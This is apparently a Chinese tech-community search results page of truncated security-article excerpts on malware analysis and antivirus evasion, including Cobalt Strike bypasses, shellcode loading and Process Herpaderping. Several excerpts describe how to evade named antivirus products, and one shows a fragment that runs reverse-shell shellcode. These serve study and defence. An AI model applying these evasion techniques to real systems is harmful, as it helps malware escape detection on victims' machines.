首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

CS学习笔记 | 26、杀毒软件

3、大多数杀毒软件的一个弱点就是只会在浏览器下载文件或者文件写入磁盘时才会检查这个文件的特征码,也就是说在这种情况下才会检查文件是否是病毒。...3、一些杀毒软件会在沙箱环境中去运行可疑文件,然后根据该可疑文件的行为判断是否病毒。 0x04 如何免杀 首先要判断目标使用了哪款杀毒软件,然后自己在虚拟机中去尝试绕过它。...比如 Artifact Kit 中的 src-common/bypass-pipe.c 会生成可执行文件和DLL,它们通过命名管道自己提供shellcode。...使用 VT 检测发现仅有 8 个引擎检测到,感觉效果好像还行。 ? 把每个杀软的病毒库升级到最新后,实测可以过腾讯电脑管家、火绒, 360 安全卫士 、 360 杀毒不行。...实测可以过360 安全卫士、 360 杀毒,腾讯电脑管家、火绒不行。 看到 VT 的检测结果后,我还以为四款杀软都能检测到呢,没想到啊。 ?

2.3K20

对端口扫描的CS木马样本的分析

但它也通常被利用于恶意木马后门、利用于远程控制。 它支持通过 shellcode方式,创建自定义的C2二进制可执行文件,还支持通过修改代码来隐藏恶意程序。...通过下图的监控工具截图中可以看到,该样本在启动后通过http方式的网络通信行为,所指向的服务器:124.70.22.50:8090 下图通过威胁情报的数据中心分析,该ip是华为云的,并且这个ip所指向的都已被标识病毒相关信息...文件、dll文件、zip文件构成的,其中高危端口检测.pyc就是样本的主程序。...下图是反编译转换后高危端口扫描.py的源代码,这代码里面主要的功能实通过base64去加解密,通过开启一个线程去执行自定义的shellcode代码(shellcode代码可以用于对抗病毒查杀软件的查杀,...防护思考 目前Cobalt Strike所有的后门都比较活跃,在红蓝对抗中占据很重要的地位,建议提前部署具备高级威胁检测能力的安全产品进行及时监控、防范。

32040
您找到你想要的搜索结果了吗?
是的
没有找到

新的跨平台“SysJoker”漏洞发现 通杀macOS在内的多个系统

虽然“全平台通杀”病毒并不常见,但是安全公司Intezer的研究人员发现,有家教育公司在上个月中了招。 更可怕的是,他们通过分析域名和病毒库发现,这个恶意软件已经存在半年之久,只是直到最近才检测到。...通常情况下,恶意软件只为攻击一个平台的特定漏洞而生成,而不是以类似的方式同时多个平台开发。根据研究人员的技术分析,SysJoker认为是在2021年下半年的一次攻击中启动的。...SysJoker用C++编写,每个变体都是目标操作系统量身定制,之前在57个不同反病毒检测引擎上都未被检测到。 那么SysJoker到底是如何通杀三大系统的?...如何查杀SysJoker 尽管SysJoker现在被杀毒软件检测出的概率很低,发现它的Intezer公司还是提供了一些检测方法。...如何检测SysJoker Intezer公布了一份系统攻击的指标清单,包括创建哪些文件和允许代码持续存在的LaunchAgent。 SysJoker创建的文件和目录包括。

62230

动态加载 ShellCode绕过杀软

病毒解决方案用于检测恶意文件,并且通常使用静态分析技术来区分二进制文件的好坏。...虽然这种绕过方法并不是新鲜技术,绕过反病毒软件对于大多数后门来说都是必要的,在这篇文章中,我们将使用virscan作为我们的检测工具,并使用Metasploit生成一些反向的ShellCode作为我们的攻击载荷...通过使用virscan云鉴定技术,可以衡量出Payload的是否免杀,需要注意的是,只有动态检测或基于行为的检测,才能真正捕获到现实世界中的Payload。...嵌入式 Shellcode 通过上方的方式生成后门文件是不可取的,因为大多数反病毒厂商都掌握了Metasploit可执行模板的签名,因此我们决定创建自己的可执行文件,然后手动实现 ShellCode的加载工作...code_length / 2); ((void(*)())exec)(); WSACleanup(); return 0; } 最终的有效负载成功地向侦听主机发送了反向shell,更重要的是,VirScan上的检测

78320

关于Python病毒样本的分析方法

由此可见,Python在网络攻击事件中的出现日趋频繁,这也安全分析人员带来新的挑战。 经过分析发现,Python打包的病毒木马主要存在以下3种形式: 1....(2) 使用方法,如下: 使用需要创建一个set.py(名称随意),文件内容: from distutils.core import setup import py2exe setup(windows=...该函数有两个参数,参数一是pyc数据的起始地址,参数二数据的长度。 注意:在py2exe中获取的pyc数据内包含多个模块,一定要将多个模块进行拆分再反编译,否则会出错的。...(2) 首先先调用Py_Initialize函数。 (3) 接下来利用PyDict_New创建一个Dict。 (4) 然后调用PyEval_GetBuiltins获取解释器。...在之后遇到的任何由Python打包的可执行文件时,可以通过对PyRun系列的函数进行检测。 ? 通过这一系列的函数,我们可以获取到打包进可执行文件内的明文Python脚本或pyc的字节码。 5.

1.7K10

全勤矿工systemdMiner最新变种利用暗网代理下载恶意模块

感染现象 感染的Linux服务器上,可以明显看到一个CPU占用率很高的进程,名字随机字符: ? 查看进程对应的可执行文件,是以一串疑似MD5的字符命名(并非文件真实MD5),已经被删除: ?...定时任务对应的sh脚本内容base64编码过的命令: ? 病毒母体-int 该ELF文件是作为病毒的母体和守护进程,运行后会将自身进程名重命名为一个随机的字符串: ?...删除自身对应的可执行文件: ? 解码并创建目录/tmp/.X11-unix,检测目录中是否存在00文件,该文件是用于记录进程的pid: ? 创建子进程: ?...通过setsid,将子进程脱离当前会话并且创建新的会话 ? 并将新的会话进程ID写入/tmp/.X11-unix/00文件: ?...bash-04 下载挖矿 下载可执行文件cpu: ? 该文件挖矿程序: ? bash-05 状态控制 下载cmd脚本: ?

1.5K31

哈哈,我把熊猫烧香病毒扒了!

3.2 安装和运行部分 检测当前目录是否存在Desktop_.ini文件,如果存在则删除,该文件保存病毒感染当前目录的日期。...接着,病毒会通过检查文件路径、病毒感染标志来确定进当前病毒属于以下三种情况的哪一种情况。进程本身属于原始病毒文件、感染的可执行文件、以及伪装目标进程三种情况。...感染的可执行文件 1)在当前目录释放感染的原始文件 2)创建自删除批处理,并运行 3)拷贝病毒部分到到系统目录,伪装系统服务。 伪装的目的进程文件 继续执行其他模块功能。...病毒的感染标识 感染PE文件后,会在文件的末尾写上标志,格式: WhBoy+ 源文件名 + 0x2标记 + 源文件大小+0x1标记 感染文件结构 病毒文件 + 原始文件 + 标记字符串 3 感染web...4.2 手工查杀 4.3 编写专杀工具 思路: 编写一个程序,遍历文件,如果是可执行文件,则检查标志字符串,如果是感染文件则还原原始文件,如果是web文件,则删除最后一个iframe。

2.1K40

极棒 CAAD 登陆 DEF CON:腾讯安全云鼎实验室揭秘病毒免杀“新武器”

人工智能的飞速发展正在将世界带入一个全新的维度,这同时也将网络世界的正邪对抗推入下一个战场。...腾讯安全云鼎实验室在 CAAD Village 上带来前沿议题分享,云鼎实验室安全专家张壮、史博以基于卷积神经网络的多形态恶意软件检测例,分享了安全厂商应用人工智能之后对抗病毒免杀技术的效果;同时还站在攻击方的视角...此外,免杀技术也已从黑客的专业技能变成了一项可以用低廉价格轻易获取的标准服务:在暗网只需370美金,在国内花费1800元就可获得一套免杀服务。这无疑进一步加剧了安全厂商应对病毒攻击的挑战。...人工智能查杀可以处理海量样本,检测特征纬度更广,病毒免杀难度增大。对于加壳或者多态变形病毒也有着良好的效果,检测过程无需脱壳。...张壮进一步表示,GAN 应用在免杀中,攻击者对于攻击模型的结构和权重都有完全的了解,而常规的攻击手段对于攻击的模型却一无所知,“最终通过把‘黑文件’伪装成为具有高可信度的‘白文件’,以达到欺骗机器学习模型

1.2K20

DEF CON 2018:腾讯安全云鼎实验室揭秘病毒免杀“新武器”

人工智能的飞速发展正在将世界带入一个全新的维度,这同时也将网络世界的正邪对抗推入下一个战场。...腾讯安全云鼎实验室在 CAAD Village 上带来前沿议题分享,云鼎实验室安全专家张壮、史博以基于卷积神经网络的多形态恶意软件检测例,分享了安全厂商应用人工智能之后对抗病毒免杀技术的效果;同时还站在攻击方的视角...此外,免杀技术也已从黑客的专业技能变成了一项可以用低廉价格轻易获取的标准服务:在暗网只需370美金,在国内花费1800元就可获得一套免杀服务。这无疑进一步加剧了安全厂商应对病毒攻击的挑战。...人工智能查杀可以处理海量样本,检测特征纬度更广,病毒免杀难度增大。对于加壳或者多态变形病毒也有着良好的效果,检测过程无需脱壳。...张壮进一步表示,GAN 应用在免杀中,攻击者对于攻击模型的结构和权重都有完全的了解,而常规的攻击手段对于攻击的模型却一无所知,“最终通过把‘黑文件’伪装成为具有高可信度的‘白文件’,以达到欺骗机器学习模型

1.7K30

熊猫烧香应急处理方法

熊猫烧香病毒机理分析 (1)自启动方式 熊猫烧香病毒将自身拷贝至系统目录,同时修改注册表将自身设置开机启动项 这种方式也是绝大部分病毒自启动所采用的方式。...b、感染网页 熊猫烧香病毒会查找系统以 .html 和 .asp 后缀的文件,在里面插入网页标记,这个帧iframe会将另外一个URL嵌入到当前网页,并且宽度和高度设置0(看不到)。...b、自动恢复“显示所有文件和文件夹”选项隐藏功能 某些用户去看隐藏文件,会主动点击查看隐藏文件夹,这个病毒会自动恢复隐藏。...实战过程 实验环境: Windows XP 吾爱破解专版 实验文件:setup.exe(熊猫烧香) 手动查杀病毒基本流程 1、排插可疑进程 2、检查启动项 3、删除病毒 4、修复病毒破坏的文件 第一步...终止进程 指令:**taskkill /f /im + 对应的PID值 ** /f 表示强制执行 /im 表示文件 这里输入的是:taskkill /f /im 1752 第五步 查询启动项 第六步 检测这个启动项创建的位置和键值

18810

Process Herpaderping(Mitre:T1055)

,而不是在进程对象创建时开始,这攻击者创建和映射进程,然后更改文件内容并创建初始线程创造了机会 进程Herpaderping Herpaderping是一个英语俚语,指的是经常因为健忘而取笑的人,...),并保持文件句柄打开 将文件映射图像部分 NtCreateSection和SEC_IMAGE标志集 使用区段句柄创建流程对象 NtCreateProcessEx 复制我们的有效载荷,然后使用之前打开的文件句柄...powershell wget 192.168.0.89/payload.exe -O payload.exe 一旦有效载荷成功传输,我们就可以运行进程Herpaderping可执行文件来运行隐藏在其他合法可执行文件下的有效载荷...,并且在运行时没有检测到我们的有效负载是恶意的 在受害者系统上的process explorer中检查此攻击时,如果您看到合法的可执行文件中派生出可疑的子进程,您应该会感到可疑,这里的cmd.exe是从...notepad.exe派生出来的,它不允许运行指示进程注入攻击的可执行文件 入侵检测病毒的签名可以更新,以检测已知的功能,比如IRP_MJ_CLEANUP或NtCreateProcessEx,然后进一步进行行为分析

56620

十一.那些年的熊猫烧香及PE病毒行为机理分析

如下图所示,左边是一个正常程序(QQ),感染之后会将病毒放在前面,正常程序放在后面,程序运行之后,病毒会拿到控制权。缺点是程序图标会显示前面的病毒程序,显示熊猫烧香,这是一个明显的感染特征。...感染的用户系统中所有.exe可执行文件全部改成熊猫举着三根香的模样。2006年10月16日由25岁的湖北武汉李俊编写,2007年1月初肆虐网络,它主要通过下载的文件传染传播。...注意,该Setup.exe文件设置隐藏、只读、系统,虽然我们可以查看“隐藏的项目”,某些隐藏的系统文件仍然是看不到的。...第六步,检测该启动项创建的位置及键值。...在过滤器中删除注册表的修改,然后检测熊猫烧香病毒是否创建文件,创建文件也是病毒的重要手段。

8.6K60

众多玩家感染!超级马里奥植入恶意软件

该游戏一经推出便颇受欢迎,认为是既保留了马里奥系列的经典机制,又具有更现代化的图形、造型和声音,目前已经发布多个后续版本,修复了错误并进行了改进。...Umbral Stealer 还能创建受害者 Windows 桌面的屏幕截图或操纵网络摄像头,所有被盗数据在传输到 对方的C2服务器之前都将存储在本地。...对于未开启篡改保护的设备,Umbral Stealer 能够通过禁用该程序来逃避Windows Defender的检测即便开启了防篡改,也能将进程排除在威胁列表之外。...此外,Umbral Stealer 还会修改 Windows 主机文件,以损害防病毒程序与其公司服务器的通信,从而破坏防病毒程序的有效性。...完整的感染连 安全专家建议,如果用户最近下载了这款游戏,应尽快对设备进行恶意软件扫描,删除检测到的任何恶意软件,并在检测到恶意软件后,将存储的任何敏感密码信息重置,并使用密码管理器进行存储。

17030

浅谈无文件攻击

这种类型的感染特别难以检测,因为大多数防病毒产品都没有检查固件的能力。按感染主机对无文件威胁进行分类在介绍了广泛的类别后,我们现在可以深入了解详细信息,并提供感染宿主的细目。...虽然任务很复杂,固件可能受到恶意软件的感染,就像公式间谍组织抓到一样。基于CPU的(类型I):新式CPU很复杂,可能包括用于管理目的运行固件的子系统。...基于虚拟机监控程序的(类型I):新式CPU提供硬件虚拟机监控程序支持,使操作系统能够创建可靠的虚拟机。虚拟机在封闭的模拟环境中运行,理论上不知道仿真。...防病毒无法检查任何二进制可执行文件。虽然Office应用需要用户的明确同意才能从文档中执行宏,攻击者使用社交工程技术来欺骗用户允许执行宏。...启动记录位于文件系统外部,操作系统可访问它。新式防病毒产品能够对其进行扫描和还原。发展历史利用缓冲区漏洞2001年7月19日,红色代码病毒曝光,当天全球超过359000台计算机受到了感染。

12510

二进制程序分析指南

静态分析方法—Virus Total 将样本上传到VirusTotal,引擎会与各种反病毒程序的检测结果进行交叉比对,产生综合报告。...在下图中,可执行程序“malware.exe”正在读取注册表项、创建文件和启动网络连接。 检查恶意软件在主机中的行为,会对研究人员回溯病毒的来源、传播有重大好处。...动态分析方法—打补丁 恶意程序使用特别的保护机制来防止逆向。包括:反调试,虚拟化环境检测,收集用户网络行为,代码混淆,代码加解密等。...如果恶意软件检测到上述情况,它可以自行终止或改变其执行逻辑,以防研究人员回溯。 研究人员可以通过打补丁来绕过这些检测机制,并将其保存为一个新的可执行文件,可以在不受检测机制影响的情况下进行分析。...5)将展示一个包含所有更改的内容的窗口。点击“Patch File”并将其保存为新文件。 动态分析方法—创建规则(Misp & Yara) Yara规则基于文本或二进制模式创建

2K10

有工具了,如何快速发现Windows中毒(含工具下载)

本文是之前《没有外部工具,如何快速发现Windows中毒了》的姊妹篇,探讨Windows电脑感染多种典型病毒后,在没有专业杀毒软件情况下的快速检测方法。...已知的病毒会以高于0检测率的水平弹出,即使病毒没有识别出,还是很容易通过一些奇怪的名称或者红色警戒提示而发现他们,如下图所示。 ?...Mandiant ShimCache (AppCompat Cache) Parse 这个小工具因为通过命令行以及快速我提供运行文件名单而帮我节省了大量的时间,注意如果没有使用新的exe,这个方法可能不会显示以非...Control\Session Manager\AppCompatCache" shimcache.reg 然后把你存放Mandiant脚本的文件解析出来: python shimcacheparser.py...-o output.csv -r shimcache.reg 这将生成输出一个.csv文件,你应当按日期或者文件夹名称排序,然后分析那些名称奇怪的可执行文件

1.4K90

远控免杀专题(6)-Venom免杀(VT免杀率1171)

几点说明: 1、上表中标识 √ 说明相应杀毒软件未检测病毒,也就是代表了Bypass。...| ruby | dll | msi | hta-psh)等,然后将生成的shellcode注入一个模板(例如:python),并使用类似gcc、mingw32或pyinstaller之类的编译器生成可执行文件...Venom的一些功能还会直接调用Veil-Evasion.py,unicorn.py,powersploit.py等来直接创建免杀程序,避免重复造轮子。...在测试机执行后,发现360安全卫士和360杀毒静态检测没问题,行为检测都能查杀出病毒 ? 火绒则静态+动态都没有检测到 ? virustotal.com中19/71个报毒 ?...生成编译的过程中可以看到他生成的shellcode其实是直接调用的msfvenom,而且在最后也可以和msf联动进行监听,还支持apache的web分发,很多模块都能和msf无缝对接,虽然被杀软盯的紧免杀体验还是不错的

2.6K30

独家 | 基于NLP的COVID-19虚假新闻检测(附代码)

作者:Susan Li 翻译:杨毅远 校对:吴金笛 本文长度4400字,建议阅读8分钟 本文大家介绍了基于自然语言处理的COVID-19虚假新闻检测方法以及可视化方法,并结合真实的新闻数据集与完整的代码复现了检测以及可视化的过程...一些文章或帖子已从互联网或社交网络中删除,但是,他们仍能够在网络中被查询到。...print(word, freq) natural_bigram.py naturalnews.com一直在传播虚假信息,例如在中国实验室将冠状病毒设计为生物武器,并且/或者传播病毒来掩盖暴露于5G无线技术有关有害健康的影响...print(word, freq) ortho_bigram.py orthomolecular.org一直在推广使用大剂量静脉注射维生素C作为治疗方法,尚无根据。.../explore-covid-19-infodemic-2d1ceaae2306 编辑:王菁 校对:杨学俊 译者简介 杨毅远,清华大学自动化系研一在读,本科毕业于华中科技大学自动化学院实验班,研究方向工业过程检测中的

2.4K30

你真的了解计算机病毒吗?内容很“干”,记得喝水

计算机病毒会通过各种渠道从已被感染的计算机扩散到未被感染的计算机,造成感染的计算机工作失常甚至瘫痪。是否具有感染性是判别一个程序是否计算机病毒的重要条件。...熊猫烧香是一种蠕虫病毒的变种,经过多次变种而来,由于中毒电脑的可执行文件会出现“熊猫烧香”图案,所以也被称为 “熊猫烧香”病毒病毒只会对exe文件的图标进行替换,并不会对系统本身进行破坏。...感染的用户系统中所有.exe可执行文件全部改成熊猫举着三根香的模样。...检测病毒 检测计算机上是否病毒感染,通常可以采用手工检测和自动检测。...检测病毒的技术和方法主要有以下几种。 比较法 比较法是将原始备份与检测的引导扇区或检测的文件进行比较。该方法的优点是简单、方便,不需要专用软件。缺点是无法确认计算机病毒的种类和名称。

1K10
领券